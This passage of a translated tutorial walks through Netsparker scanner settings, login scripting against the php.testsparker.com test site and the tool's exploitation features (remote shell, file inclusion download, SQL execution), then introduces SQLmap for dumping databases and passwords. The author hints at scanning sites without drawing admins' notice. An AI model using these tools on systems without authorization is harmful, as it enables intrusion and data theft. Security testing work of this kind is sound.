Conveniently, the list is sorted from minimum to maximum.

It is better not to disable anything here - let the report be as complete as possible.

Custom Cookies is a menu item where you can insert your own cookies, for example, intercepted ones:

The last item is the Crawling setup, AKA building a sitemap:
Find & Follow New Links - Follow the links found.
Enable Crawl & Attack at Same Time - Attack simultaneously with scanning.
Pause Scan After Crawling - Stop the software after drawing up a complete sitemap.
Incremental Scan - Augmented scan based on the previous scan. Cannot be used without a finished map of the resource or on a new scan.

Scope

Scan area settings. Includes only three fields:

Scope - Select the scan scale:
Entered Path and Below - Scanning a page and deeper
Only Entered URL - Scanning only the entered page
Whole Domain - Scanning an entire domain

Next - Exclude URLs with RegEx. Exceptions.
Regular expressions; the program will skip pages that match them. To invert this function, just mark Include instead of Exclude in the lower right corner of this item:

Include URLs with RegEx - Regular expressions; the program will crawl pages that match them first

Disallowed HTTP methods - Disallowed request types

In total, the program supports 13 types of requests:

We select the methods of requests to the server; turn on everything, and we will not change anything here. I will not describe each of them in detail, since this information is not necessary in our case and can easily be found on the Internet.

Additional Websites

Additional sites and links to crawl

The fact is that Netsparker does not scan pages that are on a different domain from the main one. As an example, I can cite my previous article, where there was a site ixi.store. When switching to the affiliate program, we were transferred to the partner.ixi.store domain. So the program will scan only ixi.store, but will not compile a sitemap of partner.ixi.store.

Therefore, to achieve a full scan, you need to add this domain to the additional scan list:

To do this, just insert the link we need into the text field and click on the square on the right in the Canonical column to make a check mark appear.

It is also worth warning that the program accepts links only in the correct form, that is, as a complete link. Links like partner.ixi.store will be considered incorrect:

Imported Links

Links that Netsparker will crawl in addition to the main domain. Also, when the Scan Imported Links Only button is selected, the program will scan only what we have put here. Let's explore the main functions of this menu.

Add - adding links

After clicking on this button, a new configuration window opens:

This is a form for creating a scan request and adding a link to the list of links to scan.
It's very simple, because the program will do everything automatically for you.

Let's say we have a link to rybolov.org that we want to add. To do this, just insert this link into the Host line. The domain that we will scan is usually entered there. But if we are going to "conduct an investigation" on individual links and sites, we can safely paste the copied link into this field. The program will automatically edit everything:

If we have a completely different site in the scan profile, Netsparker will warn us about this and suggest changing the header.
Yes - Change
No - Do not change

Edit - edit the entered link. The same can be done by double-clicking the desired line.
Delete - delete the selected line. Another option is to press the Delete key on your keyboard.
Clear - complete clearing of the list; deletes all lines.
Search - search through the list. This function can be called with the key combination Ctrl + F.
Import From File - import data from files. It also accepts reports from other programs:
After choosing the type of imported file, select this file on your computer.
Enter Links - manual entry of links. In addition, you can choose the format of the links you enter. In my case, it's Relative or Absolute Links.

After entering the links, we see the following picture:

Everything was imported successfully.

URL Rewrite

Link conversions. This makes it much easier for search engines to index all pages on the site.
Use Heuristic URL Rewrite Support - The program will automatically detect other URL rewriting rules. Both custom and heuristic rules will also apply.
Root Path Maximum Dynamic Signatures - maximum dynamic signatures in the root path.
By default, their value is 60.
Sub Path Maximum Dynamic Signatures - maximum dynamic signatures of the sub path. Usually the value is 30.
Block Separators - separators. Classic separators are / $.,; |:
Analyzable Extensions - extensions that will be analyzed. In our case htm and html.
Use Custom Rewrite Rules - Netsparker will use custom link rewriting rules. To create / test a rule, click on the New button.

A window opens where we will edit the link for the example. We will use rybolov.org. Here we need to choose where we will rewrite and what:

Select the parameter to be overwritten, select its type and enter the name of the parameter. There are a lot of parameter types, but if you don't want to mess around, choose Any. After these actions, we can observe how the program itself creates regular expressions and executes new rewriting rules.

To delete a rule, select the required line and click on Delete:

No URL Rewrite - do not convert links

We're done with this menu. It remains to consider the Authentication menu.

This menu is responsible for configuring authentication on the scanned resource. Sometimes a resource can be closed, and for a full report you will need to log in to it.

We will consider this function through authorization at php.testsparker.com. It is intended for testing Netsparker, and it seems to me that it is great for an illustrative example. Let's start!

Form

Select a form for authorization on the resource. To "enable" automatic authorization, you must check the Enabled box:

Now we need a link to the data entry form for logging in to the personal account. In our case, this is the link http://php.testsparker.com/auth/login.php.
We enter it in the Login Form URL:

After that, enter your login information. It is entered in the Personas field.
Active - selection of the login and password combination that will be used
Username - Username
Password - User password

We will fill in the data as follows:
Login - admin
Password - admin123456

These data are written on the site itself:

After entering, everything should look like this:

There are also settings for authorization by login and password. We'll look at them in turn:
Interactive Login - The program enters the data and then transfers control to the user. It is mainly used to bypass captcha: the user of the program enters it manually, then completes the authorization and transfers control back to the program.
Override Target URL with authenticated page - Use the final page of the authentication process as the starting point instead of the entered URL. If this option is selected, Netsparker will not make a request to the specified target URL.
Detect Bearer Authorization Token - if an AJAX request is received after authorization on the site, the intercepted tokens will be used for scanning.

Now let's verify the login and logout functions. This is done using the Verify Login & Logout button. It looks like this:

Immediately (or almost immediately) a window opens:

This window can be roughly divided into two sections:
1 - Login check section
2 - Logout check section

Immediately after opening this window, Netsparker will begin initializing the login.

The circles in the lower right corners of the sections indicate the work done. They are yellow by default. They look like this:

Immediately after the login is initialized, work on the logout begins. The completed work will look like this:

If the program has coped with the task, the circle in each corner will be green:

You can check whether the login page is verified in the settings menu of the authentication form, which we reviewed earlier.
The following message should have appeared next to the Enabled item:

If the login has not been verified, we will write login scripts. It's not as complicated as you might think. I'll help you. To create a "scenario" according to which Netsparker will perform the login, click on the Custom Script item:

After clicking, the program itself tries to explain to us how we will write scripts:

I created this script earlier, so let's look at the left menu first. I will explain how scripts work.

netsparker.auth.login(username, password); - this command should be there by default. This is the initialization of variables with a login and password, which we entered into the form at the very beginning.

As I understand it, the program fills in the form using a CSS selector, which is copied automatically.

In order to create your own script, right-click on the login field. We are looking for it in the window on the right:

Right-clicking on any item will always bring up the same menu. It consists of four items, of which we will use only two at most. But we will go through all of them at once:

Log element to console - logging of the selected element to the console. A very convenient thing to avoid looking for an element in the page code. After clicking on this item, find our element in the console below:

This function is very convenient if we need to work with an element separately. For example, copy its selector, or just change it.

Generate Element code - automatic generation of code using the selected element. After clicking on this item, a line of code appears in the left menu. Of course, we will not understand anything right away, so I will specially analyze this line of code for you:

netsparker.auth.setValueByQuery('#content > div.post > form > input[type="text"]:nth-child(1)', username);

It consists of four elements:

1 - netsparker.auth.setValueByQuery - defines the action to be performed on the element. Its first part, netsparker.auth., is always static.
The second part of the first element is of two kinds: setValueByQuery and clickByQuery. In the case of setValueByQuery, the program will write data. clickByQuery, on the other hand, initiates a click on an element; it is usually used for buttons and other elements, such as links.

2 - '#content > div.post > form > input[type="text"]:nth-child(1)' - this is the path to the element to which the action described in the first element will be applied (that is, either a click or data entry). The path to the element is written as a CSS selector. To get such a path ourselves, we turn to Log element to console and copy the selector from the console. Thus, we get an identical path that can be entered manually. For example, the path to the password field would be #content > div.post > form > input[type="password"]:nth-child(3). Copied this from the console like this:

3 - username or password. These two variables were initialized by the first line, netsparker.auth.login(username, password); They work only on text fields. As you understand, we are not going to enter anything into buttons, so these variables are applied only to text fields.

4 - Pause element. Together with it, we will consider the last menu item - Generate element code (delay 2000ms):

This item adds a pause. By default, this is two thousand milliseconds (which is equal to two seconds). In the case of a text field, this value is appended after the entered variable, for example, username:

If we talk about buttons, then clicking on the authorization button will look like this:

netsparker.auth.clickByQuery('#content > div.post > form > input[type="submit"]:nth-child(7)');

In the case of a pause, the value is appended immediately after the path, since the variables, as I said, do not take any part.
The pause option looks like this:

netsparker.auth.clickByQuery('#content > div.post > form > input[type="submit"]:nth-child(7)', 2000);

Now let's formulate the mask by which the code is built:

What to Do ('path', variable, pause);

Now with this knowledge, we can write our own script (or generate it via Generate element code). The finished version will look like this:

To test it, click on the Test Script button:

And we observe the work of the script:

If everything works, click on OK, after which we are returned to the main start menu, and the Custom Scripts item is filled in:

We are done with this point.

Basic, NTLM / Kerberos

Authentication via the Basic, NTLM and Kerberos protocols

We will linger on this topic a little longer to figure out what kind of protocols they are.

The Basic protocol can be found, for example, when trying to connect to the FTP of any site through a browser.

NTLM is a network authentication protocol that was developed by Microsoft specifically for its operating systems.

Kerberos is also a network authentication protocol, whose mechanism is mutual authentication between a client and a server. It is also supported by operating systems of the Windows family. A more secure protocol based on the Single Sign-On principle.

In addition to these three, the program supports two more types: Digest and Negotiate. Consider them as well:

Digest - commonly used by web servers to process user credentials entered into a web browser. VoIP uses a similar method.

Negotiate is a scheme inherent in the Windows family that offers a choice between NTLM and Kerberos.

Now we can start studying the form itself. It consists of five elements (the program supports only five types of authentication: Basic, NTLM, Kerberos, Digest and Negotiate):

1 (Type) - Authentication type.
2 (URL Prefix) - URL to be logged in to.
3 (Username) - Username
4 (Password) - User password
5 (Domain) - Domain, optional item.
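Returning to the custom login script from the Form section above, here is an added example (not Netsparker's code and not the article author's) that runs the two calls dissected there against a stand-in `netsparker.auth` object, so the step order and the "What to Do ('path', variable, pause)" mask can be checked outside the scanner. The stand-in, `checkSelector`, `runLoginScript` and the masking of the password are assumptions of this example; the selectors and the admin / admin123456 test login are the ones given in the article.

```javascript
// Stand-in for the scanner's scripting object. Assumption: only the two calls
// dissected in the article are modelled; the real object exists only in the product.
const TYPOGRAPHIC_QUOTES = /[\u2018\u2019\u201C\u201D]/;

// Reject selectors damaged by copy/paste, a common reason a login script fails.
function checkSelector(selector) {
  if (typeof selector !== 'string' || selector.trim() === '') {
    throw new Error('selector must be a non-empty string');
  }
  if (TYPOGRAPHIC_QUOTES.test(selector)) {
    throw new Error('typographic quote in selector: ' + selector);
  }
  if (/[#.:]\s/.test(selector)) {
    throw new Error('space after "#", "." or ":" in selector: ' + selector);
  }
  return selector;
}

// The pause is optional; when present it is a whole number of milliseconds.
function checkDelay(delayMs) {
  if (delayMs === undefined) return 0;
  if (!Number.isInteger(delayMs) || delayMs < 0) {
    throw new Error('pause must be a non-negative number of milliseconds');
  }
  return delayMs;
}

function createRecorder() {
  const steps = [];
  const auth = {
    // Mask: setValueByQuery('path', variable, pause)
    setValueByQuery(selector, value, delayMs) {
      const path = checkSelector(selector);
      if (typeof value !== 'string') {
        throw new Error('setValueByQuery needs a value to type');
      }
      const isSecret = /type\s*=\s*["']password["']/.test(path);
      steps.push({
        action: 'setValue',
        selector: path,
        value: isSecret ? '***' : value, // never keep the password in the trace
        delayMs: checkDelay(delayMs),
      });
    },
    // Mask: clickByQuery('path', pause) - buttons take no variable
    clickByQuery(selector, delayMs) {
      const path = checkSelector(selector);
      if (typeof delayMs === 'string') {
        throw new Error('clickByQuery takes a pause, not a value');
      }
      steps.push({ action: 'click', selector: path, value: null, delayMs: checkDelay(delayMs) });
    },
  };
  return { netsparker: { auth }, steps };
}

// Run a script against the stand-in and return the ordered list of steps.
function runLoginScript(script, username, password) {
  const { netsparker, steps } = createRecorder();
  script(netsparker, username, password);
  // Sanity rule of this example: a form login has to end with a click.
  if (steps.length === 0 || steps[steps.length - 1].action !== 'click') {
    throw new Error('script must end by clicking the submit control');
  }
  return steps;
}

// The login script for php.testsparker.com, built from the article's selectors.
function loginScript(netsparker, username, password) {
  const form = '#content > div.post > form > ';
  netsparker.auth.setValueByQuery(form + 'input[type="text"]:nth-child(1)', username);
  netsparker.auth.setValueByQuery(form + 'input[type="password"]:nth-child(3)', password);
  netsparker.auth.clickByQuery(form + 'input[type="submit"]:nth-child(7)', 2000);
}

console.log(runLoginScript(loginScript, 'admin', 'admin123456'));
```

A selector pasted with typographic quotes or stray spaces, such as `'# content> div.post> ...'`, is rejected before any step is recorded.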
To test the entered credentials, or just to watch the program work, use the Test Credentials button.

There is also one more setting, the last one in this window.

Do not expect challenge (Basic Authentication) - means that after authentication no problems or additional requirements should arise, just like with basic authentication

In addition to all this, there are tips for each item in Netsparker. They are located at the bottom of the menu:

Therefore, if you did not understand anything from what I told you, you can read the tips. And we go to the next item.

Header

Header customization. In some cases, resources use headers for authorization. This menu is for specifying those headers. It is worth paying attention to the hint, which says that the header should contain only ASCII characters. Now about its functionality. There are only two settings here:
Name - the name of the header
Value - the value of the header.

Example: name is auth, value is true. It will look like this:

You can use a kind of built-in constructor, which is opened with the Add Authorization Header button.

After clicking on this button, the following window opens:

In Type we select the type, and in Credentials the same value. In order not to get stuck at this point, I will enter a random value in order to show what is written at the output.

To save the data, click Save.

To delete a line, click on any value (Name or Value) and press Delete:

Client Certification

Client certificate for authorization on the resource

By default, this is DO_NOT_TRUST_NetsparkerRoot, but you can add your own by clicking on the Add New button.

The program accepts PFX and P12 files.

PFX and P12 are extensions of the PKCS #12 standard. It did not become clearer, as I see it. This standard is used in cryptography. The very name PKCS is an abbreviation for "Public Key Cryptography Standards". In our language, PKCS would sound like SKOK.
In our case, this is PKCS #12, which is a file format for storing keys that is recognized and used by many browsers and email agents. PFX and P12 are extensions of the same format.

Smart card

Authentication on the resource through a readable card. If you have such a card, activate the item.

To add data, click on Import Smart Card Certificate.

Then Netsparker will start looking for a driver for reading cards, and then save the certificate it read. After reading the card, enter the PIN code in the PIN field and click on Get Certificates. After this procedure, click Import and in the main menu select the certificate we need, which the program read earlier.

We have gone through the scan settings. Now we can proceed to the main window of the Netsparker program!

Let's start a test scan.

1 - Main pages of the program. During the scan, two more are added: Link and Vulnerability.
2 - Menu with items and functions. For each page, everything is different and in different quantities. Lord, I still have to consider each of them ...
3 - Sitemap generated by the program during scanning.
4 - Controlled scanning. You can check the items from the third menu (which will appear in the upper Choose Parameters to Scan window) separately for the parameters selected in the Choose Security Tests window. By the way, this is a very useful item if in the scan parameters you have chosen only to draw up a map without attacks. Thus, you can hit the right nodes precisely, and not hammer the entire site, as happens with a normal scan.
5 - Window with the most detailed scan report (and not only).
6 - List of found items, grouped by the Netsparker database. Easier to show in practice.
7 - Brief information about the scan. Scanning speed (current and average), number of requests, failed requests, time spent.
8 - Found vulnerabilities, potential vulnerabilities, flaws and general information about "problem" areas.
9 - Program log, report on work.

So. Let's do a full scan of php.testsparker.com.
Just a scan, no settings, except that we'll add authorization via login and password. How to do it - see above. Just in case, let me remind you:

Now let's wait a bit to see the full picture. This site was created specifically to test the program, so it contains all possible holes, flaws and vulnerabilities. All the better for us, because we can see what the program is capable of.

First, let's examine the functions of menu number one (1):

File

Work with program files. Import, export, etc.

Let's examine this function:

All autosaves and saves of previous scans are located here. To load one, find the save we need and double-click it.

You can load someone else's report (or your own, if saved separately) using the Browse button.

To export a report, use the Export button in the left menu.

Then we create a file with the nss extension. In fact, two files are created:

Everything is in order: one part is the report, the other is the report's database.

After that, the data loading icon appears in the center of the screen:

When the loading is over, the Home page will open. And to return to it without loading a report, there is a button in the upper left corner:

You can also look at the beautiful and minimalistic design of the About window:

Well, and Exit, if you are suddenly tired of everything and want to do something else:

All clear? It's strange if not. If it's still not clear, read it again.

It's time to deal with the Home tab.

New - new scan
Schedule Scan - scheduled scanning.
Incremental Scan - Augmented scan based on our
Schedule Incremental - a postponed additional scan that requires a report on which the work will be carried out.
New Instance - opens a new Netsparker instance.
Retest all - retest all found vulnerabilities to find out if they were fixed or not. Useful if you are checking your own resource.
Hawk Check - check for Out-of-band vulnerabilities.
These are vulnerabilities such as Blind SQL Injection, Blind Cross-site Scripting, etc. It also belongs to the post-scan checks.
Import - import a report / session
Export - export our session / report
Scan Policy Editor - editing the resource scan policy:

Consider this item. Here you can change the policy right during the scan. For example, if during the scan it turned out that this is a Linux system, all tests for Windows can be disabled to speed up the work.

If we look at the interesting things, there are a couple of quite tasty parameters. For example, a list of ignored mail accounts. If you have such accounts, write them down. The item is called Ignored Email Addresses.

To configure, copy the Extensive Security Checks item. To copy an item, first select the item we need, and then click on the Clone button:

The copied item will appear at the very bottom.

Security Checks - Vulnerabilities for which the resource will be scanned. Moreover, each vulnerability has its own scan settings. For example, take our favorite SQL injection:

Crawling - search for links, drawing up a sitemap, studying a resource.
Crawling Page Limit - Page limit.
Maximum Signature - the maximum number of site signatures
Maximum Page Visits - The maximum number of visits to the site pages
Wait for Resource Finder Checks to Finish - wait for the resource finder checks to complete
Text Parser - parses text from the crawled resource
Parse SOAP Web Services - Parses WSDL files (WSDL is a language for describing web services and accessing them)
Parse REST Web Services - Parses WADL files and Swagger (framework and specification for defining REST APIs).
Fallback to GET - can we get to work already? no? okay... The program sends special HEAD requests to reveal hidden files and directories. If all else fails, Netsparker falls back to GET. Usually off
Add Related Links - Specifies whether to crawl all related links when a new one is found.
Adds all related links to the sitemap. Usually on
Enable Parameter-Based Navigation - for when the target website uses parameters, rather than pages, to serve content. For example, instead of the page tovar.php, it uses a parameter like page = tovar. Usually off
Navigational Parameter RegEx - regular expressions for the navigation parameters the program should follow on the resource.
Maximum Page Visits - the maximum number of visits to a page that contains navigation parameters; we talked about them above.

Load Preset Values - Load presets of all items for different types of sites.
DOM Load Timeout - Timeout in milliseconds to wait for the site page to load before starting the JS DOM simulation. DOM stands for Document Object Model, a programming interface that allows programs and scripts to access the content of HTML and XML files.
DOM Simulation timeout - Timeout in milliseconds (all timeouts are in milliseconds, I won't write this anymore, that's all) before the end of the JS DOM simulation.
Interevent Timeout - timeout after a JS event trigger before new events start. Just like in life.
Max Simulated Elements - the maximum number of elements in the simulation.
Skip Threshold - Skip threshold. The number of elements that will be simulated before the program starts skipping all other elements.
Elements to skip - the number of skipped elements after passing the skip threshold (referring to the item above).
Max Modified Element Depth - The simulation begins to skip examining each of the cascading elements after passing the depth threshold.
Pre-simulation Wait - timeout before starting the simulation and after loading the page
Exclude by CSS Selector - Exclude HTML elements from event simulation using a CSS selector. All matching elements will be excluded, including their descendants.
We will have to select the elements manually:

After completing the work, click on Select, and enjoy the recorded data.

Max Option Elements - the maximum number of option elements per selected element to simulate.
Persistent JavaScript Cookies - Semicolon-separated cookie names.
Open Redirect Conf. Timeout - timeout before the end of the JS DOM simulation to confirm an open redirect. How, where - do not ask. Wherever the redirection goes, that is where the confirmation will be.
XSS Confirmation Timeout - timeout before the end of the JS DOM simulation for XSS confirmation. Yes, there is such a thing too.
Filter document events - Filter the events attached to the document by name to reduce the number of events triggered during simulation.
Ignore document events - ignore events attached to a document
Filter 'colon' events - filter for events containing a colon. Commonly used by frameworks.
Extract static resources - Extract static resources from DOM elements.
Allow out-of-scope XML HTTP requests during simulation - A useful feature if the target does not load because of a badly configured scan profile

Now we are gradually moving on to other settings.

Attacking

Maximum Number of Parameters to Attack on Single Page - the maximum number of attacked parameters on one page.
Enable Proof Generation - generate an exploit report after confirming a vulnerability.
Attack Parameter Names - Generate additional attacks using the name of the request parameter.
Attack User-Agent Header - Generate additional attacks using the User-Agent header
Optimize Header Attack - I didn't understand how this function works. I only understood that the header attack will target all links
Optimize Attack to Recurring Parameters - search for duplicate parameters in different URLs.
Attacks everything that falls within the limit on attacked elements on the page (Maximum Number of Parameters to Attack on Single Page)
Recurring Parameters Attack Limit - page limit for attacks on recurring parameters
Anti-CSRF Token Names (Comma Separated) - comma-separated names of tokens for protection against CSRF attacks (Cross Site Request Forgery)
Enable Random Parameter Attacks in Cross-site Scripting Engine - using additional parameters on pages to detect vulnerabilities such as Cross-site Scripting

We continue to suffer, learning all the functions of the program.

Custom 404

Setting up 404 pages, as I understand it. Some sites use their own beautiful ones, and these are now very different from the standard 404. So that the program does not get confused and does not scan empty answers, we choose what values the 404 pages have in order to detect them.
Auto Custom 404 - Automatic recognition. You need to enter the maximum number of 404 signatures.
Manual Custom 404 - You will have to enter the regular expressions for 404 manually.
Disabled - standard 404.
Maximum 404 pages to Attack - the number of 404 pages to bypass and attack.

Go to the Scope item

Case Sensitive - Increased SQL Injection Report. Although the scan will be more sensitive, the result was never affected, no matter how much I used Netsparker. And by default it is usually always off.
Bypass Scope for Static Checks - detection of vulnerabilities even if a scan is specified from a specific page and further, without going down to the domain.
Enable Content-type Checks - the program will ignore and not analyze pages whose Content-Type header matches the values given in the list.
Block Ad Networks - Always on. If there is a link to an advertising resource from the list, the program will skip scanning this resource.

Next on the list is Ignored Parameters

Parameters that are simply ignored.

Closer to the end - Form Values

Form data. You can add your data via URL or by uploading past scans.
We will treat these as regular expressions.

Brute force - Netsparker has about sixty brute force combinations. You can use this function to check login forms for standard passwords.
Autocomplete - Data for searching forms with autocomplete.
Netsparker Hawk - It's simple: setting up one of the post-scan checks. The URL is inserted by default.
Ignored Email Addresses - regular expressions for ignored mailboxes.
CSRF - Configuring a CSRF attack
Web Storage - Web storage
Auto Send To - Configuring automatic submission
Extensions - Scanned extensions and some settings for them: whether a parameter is attacked or not, investigated or not, and so on. To change a parameter, click on it and select the option you need from the list.

Go to the HTTP tab

Let's examine the Request item

User Agent - data of user agents. Name and value
Request Timeout (seconds) - the program will retry the request if the previous request took more than the specified time. This time the timeout is set in seconds.
Accept - setting the headers that Netsparker will use in all requests.
Accept Charset - setting the encoding for all subsequent requests.
Accept Language - Setting the language that will be used in all requests

Then there are just three checkboxes: Gzip support, server load reduction, cookie support.

Concurrent Connections - the number of connections to the target. If you set too many, there may be connection problems and / or server failure (DoS). Haha, DDoS

The second item is Proxy

Setting the proxies used for the scan. You can plug in your own proxies, just like in my last article about brute force, where you can connect your proxy account to the program

Penultimate item - Headers

This is the setting for the headers.

The last one is SSL / TLS

Configuring supported protocols.

Now the third menu item is Knowledge Base.

And immediately the first page of the menu - General

Connecting this very base to the scan.
The thing is useful, we leave it on.

The last item in this window is Comments
Regular expressions for finding information from comments. You can add your own search terms if you know what to look for.

Everything! We can go back to the program itself. I hope there will be no more such large-scale menus.

We continue to explore our top menu: There are a couple of unstudied items left for eac. For example, Report Policy Editor
In fact, this is a configuration of vulnerabilities, the presence of which will be reported by the program:

Another important point is Options
These are program settings. Everything is very simple and straightforward, let's figure it out. Believe me, you will come here sometimes. Not as often as in the scan settings (which I will dream about after this article), but you will go.

This is what the window looks like:

Now everything is in turn.

General
Language - the language of the program. Usually only two languages are supported: English and Korean.
Sounds - setting the sounds of the program. Type of sound notifications when a vulnerability is “caught”
To add your own sounds or customize existing ones, there is a Configure sounds button:

Storage
Setting up storage locations.
Data Directory is a storage location for scanned data and the like.
Password Encryption Scope - sorting passwords for setting up authentication.

Internal proxy
Internal proxies.
Listening port - proxy port
Register as the System Proxy - connecting the system proxy settings from IE.
Allow Remote Connections - the program will listen to all connected interfaces "from outside"
Use Custom Root Certificate - use your own root certificate. The program will read files with the extension .cer and .pfx (we talked about them earlier, by the way).

Logging Level
Logging and customization.
Enable Logging - Enables the logging function.
Performance Analysis - Performance analysis.
Show Attack Possibilities Knowledge Base Node - show potential vulnerabilities of a node in the Knowledge Base function tree.
Default Log Level - Select what will be reported and what will be logged by the program. The further we move the slider, the more will be logged. You can see the number of logged elements just below the slider:
Categories - categories of logging.

Auto Update
Automatic updates. Why is this included for me? Turn off.

Scan Policy
Suggest Optimization - a warning about the optimization of the scan policy.

Proxy
Setting up external proxies.
Use System Proxy - Using proxies with IE
Use Custom Proxy - use your own proxies. Data entry will be required. As in brute force. I talked about this earlier, by the way. And in the last article about databases, you can find a similar function. Nothing complicated. Enter the Username, Password, domain on which authentication will take place, etc.

Cloud
Netsparker's cloud storage settings. Disable the function and skip this item.

Well, the last menu is Extensions with a single Send To Actions item. Setting up automatic sending of data. If you will use it, the easiest way is to set up a submission to GitHub. I've experimented with this function, and somehow it didn't work out very well. This function is optional, so we skip it.

If you realized that you were tricky with the settings, then you can reset them to the standard ones:

Understood? Excellent! There is not much.

Go to the new menu: View
Well, I won't say much here. It's just setting up windows - which ones to show, which ones to not. The main six are always active, the rest are opened either automatically or manually, if you like. I'll just look at a couple of interesting features.

Encoder and Request Builder can be used outside the scan as separate functions.
Lucky they are next to each other

Let's look at the Encoder utility first. A useful utility for decrypting encoded / ciphertext. The only thing it doesn't decode is hashes. Has two fields. Entering text: And the text output: There is a settings menu in between. Encode text, or decode:

And now my favorite. Request Builder. A very handy thing for working with queries. True, the utility supports only seven requests: GET, POST, HEAD, PUT, PATCH, DELETE, and OPTIONS. I spoke about them, and I will not repeat myself. To send a request - use the Send Request button in the upper right corner. The program will configure everything automatically - just paste the link into the Host line. Only the choice of the type of request depends on you. Actually, that's all with that. I showed the main functions, then it all depends on what you want.

To return windows to default - use the Reset Layout button

The next tab to learn is Reporting
This is the export of a scan report, but more advanced, it is possible to generate a report for import into other programs.
OWASP Top Ten 2010 Report - A report for the OWASP project, in my case unreadable.
Detailed Scan Report - same raspberry as with OWASP
HIPAA Compliance Report is a human, readable report compiled in accordance with GOST HIPAA (Health Insurance Portability and Accountability Act), a la the health insurance accountability act, but in the Internet
OWASP Top Ten 2013 Report - The report for the OWASP 2013 project, in my case, remains unreadable.
OWASP Top Ten 2017 Report - Report for the OWASP 2017 project. Unlike previous OWASPs, readable and convenient
PCI Compliance Report - PCI Compliance Report,
Comparison Report is a short report. My key is broken like a border in Letov's song
Executive Summary Report - The shortest and most beautiful report on found issues with an explanation. Beautiful pie chart.
Knowledge Base Report is a “knowledge base” only report. I have it broken.
Who still does not understand what a "knowledge base" is - please read: These are the collected features of the site and found details such as postal addresses or code comments. A very useful thing. We will get acquainted with it a little later, when we finish with the main menu.
ModSecurity WAF Rules - Report of vulnerable parameters and rules of the ModSec firewall. I don’t use it, the report works.

Wow, there are still 10 points left. Let me simplify the task.
1 - Export the list of found links
2 - Export the list of crawled links
3 - Exporting the list of found vulnerabilities
There are only three options for the exported list: in CSV, JSON and XML files.
The last tenth function is a detailed report on the vulnerabilities found in XML format. Vulnerabilities List - Detailed (XML)

Before we finish parsing the reports, I will disassemble the window for saving the report:
Path - the path where the report will be saved
Policy - reporting policy. By default, this is the Default Report Policy
Export as HTML - Save report to HTML document
Export as PDF - Save report to PDF document
Open Generated Report - Open a saved report. If you make two reports - PDF and HTML, then both will open upon creation.
Save - save

The next tab is Help. This menu has nothing to do with the functionality of the program, so we will not consider it.

The active items in the Vulnerability tab depend on what kind of vulnerability Netsparker found. For example, let's take one of the previously found vulnerabilities: In addition, pages are added in the main block. Usually there are two new pages - Vulnerability and Browser View. We'll look at them later when we work with the main interface.
Retest - to double-check the found vulnerability.
Copy as cURL - copy the cURL request for this link
Generate Exploit - Creates XSS and CSRF vulnerabilities, works only for Cross-site Scripting vulnerabilities.
Accordingly, in order to be able to generate such a vulnerability, you need to select a link that has a confirmed Cross-site Scripting.
Execute SQL commands - execution of SQL commands. Only works with SQL injection vulnerabilities
Get Shell - using a shell for remote execution. Can only be exploited if there is a Code Evaluation vulnerability.
LFI Exploitation - download system and just important files from the site server if there is a Local File Inclusion vulnerability
Short Names - short names. I have never used it.
Ignore from this Scan - ignore vulnerability or item for this scan
Configure Send To Action - See the Extensions menu, Send To Actions.
ModSecurity - As I understand it, this is a report of the vulnerable settings and rules of the ModSec firewall specifically to this link.

So, everything with this menu item. It remains to consider the latter.

Link
Controlled Scan - a controlled scan of this particular page.
Send Request Builder - We have already analyzed this
Copy URL - copy the URL. You can also copy the URL from the Vulnerability tab
Next, there is a whole bunch of useless functions that I have never used - open this page in the selected browser. Not in the program, but in your browser. By the way, I've always wondered why the icons of all browsers are always round. Amigo doesn't count - it's a virus.

The last push. Let's examine the main window in more detail. This should have been done at the very beginning, but I decided to debug the sweet and simple for later.

Sitemap - sitemap. To get a report on a particular phenomenon, page and vulnerability found, you need to click on the item of interest to us.
If you right-click the mouse, you can call up a quick menu with basic functions. We've covered everything before. It is worth considering only a couple of individual ones that will help us a lot in the future.
Copy SQLmap Command - the program generates a command for SQLmap and copies it to the clipboard.
Perhaps one of the most useful features.
Exclude This Branch from Attack - exclude all pages of this node from the list of attacked
Expand - expand a node
Collapse - collapse a node

Controlled Scan - controlled scan. To get started, you need to select the desired parameter in the sitemap, select it in the upper list, select what we will scan for in the lower list and click on the Scan button. I have already talked about it several times. Once again, I will say that it is very useful when you do not attack with a scan, but simply draw up a sitemap, and then hit specific nodes, and do not force the entire system.

One large window. Several tabs. Let's start with the first one - Scan
A detailed report on the current scan: the attacked page, its parameters, the attack method, what is happening, passive analysis, etc. There is even a timer showing how long the page has already been scanned.
HTTP Request / Response - a log of HTTP requests and responses, there is a search function by response.
Attack Radar - visualization of problematic sides and their criticality. Nice, huh? You can also disable the grid with the Logarithmic item.
The other two we have already considered earlier.
Browser View - viewing this page “in the browser”. Purely visual function, nothing more. The page itself does not work.
That's all with that. These are the main pages that we will have by default.

Let's proceed to the Knowledge Base window. This window is linked to the previous one, and when we click on the element of interest, a new page opens in the previous window. I don't think I need to explain what is what here. You can poke at random and see what has opened. Everything is intuitively clear from the icons.
But since I promised to consider it in more detail, it is worthwhile to deal with each item separately:
Comments - Comments found by the program
Crawling Performance - Crawling performance report for each function
CSS Files - Found CSS files
Email Addresses - Email addresses found on the site
External Frames - External frames
External Scripts - External scripts
File Extensions - all file extensions on the site
Interesting Headers - Headers that the program paid attention to
MIME Types - found MIME types
Out of Scope Links - links and pages that were excluded from scanning
Proofs - basic data pulled from the server through exploits (for example, data from C:\windows\win.ini or a list of server processes)
Scan Performance - Report on the performance of the entire scan
Site Profile - site profile
Slowest Pages - pages that took the most time to load
Web Pages With Inputs - pages that have an input function

Issues - a short report on found problems, vulnerabilities and just information. Can be grouped by severity, by type of vulnerability, by “proof” and by page.

Everything. We've completely disassembled Netsparker. I must say right away: do not forget to configure the program when checking serious resources! The admins will not have any questions if suddenly someone searches through the entire site, drawing up a map. But if you rape the site, then it will certainly be noticed.

Therefore, use the settings and work correctly!

Let's get down to the next tool. This can be considered the last part of this article - in it I will teach you how to use SQLmap. But first, I'll tell you what it is and what we need to work.

SQLmap automates the process of finding and exploiting SQL injection, and not only finds a security hole, but exploits it to the fullest. Supports all types of injections.
The sqlmap functionality allows you to: dump databases, automatically search in the database, extract and decrypt logins and passwords, launch cmd shell, launch an interactive sql shell, in which you only need to write SQL queries to the database, and sqlmap itself will compose the payload for injection. There is an excellent Cheat Sheet that shows all the features of this tool in two pages.

To work with this utility, we need Python version 2.7. All links are given at the very beginning and I see no point in telling what to download and what to install.

In this article, I use an operating system of the Windows family, therefore, the analysis will be for this OS. In fact, working with SQLmap on shind is actually no different from working with it on Linux. The Internet is full of manuals for this program, so we will consider only the main functionality.

There are five main classes of SQL injection, and all of them are supported by sqlmap:

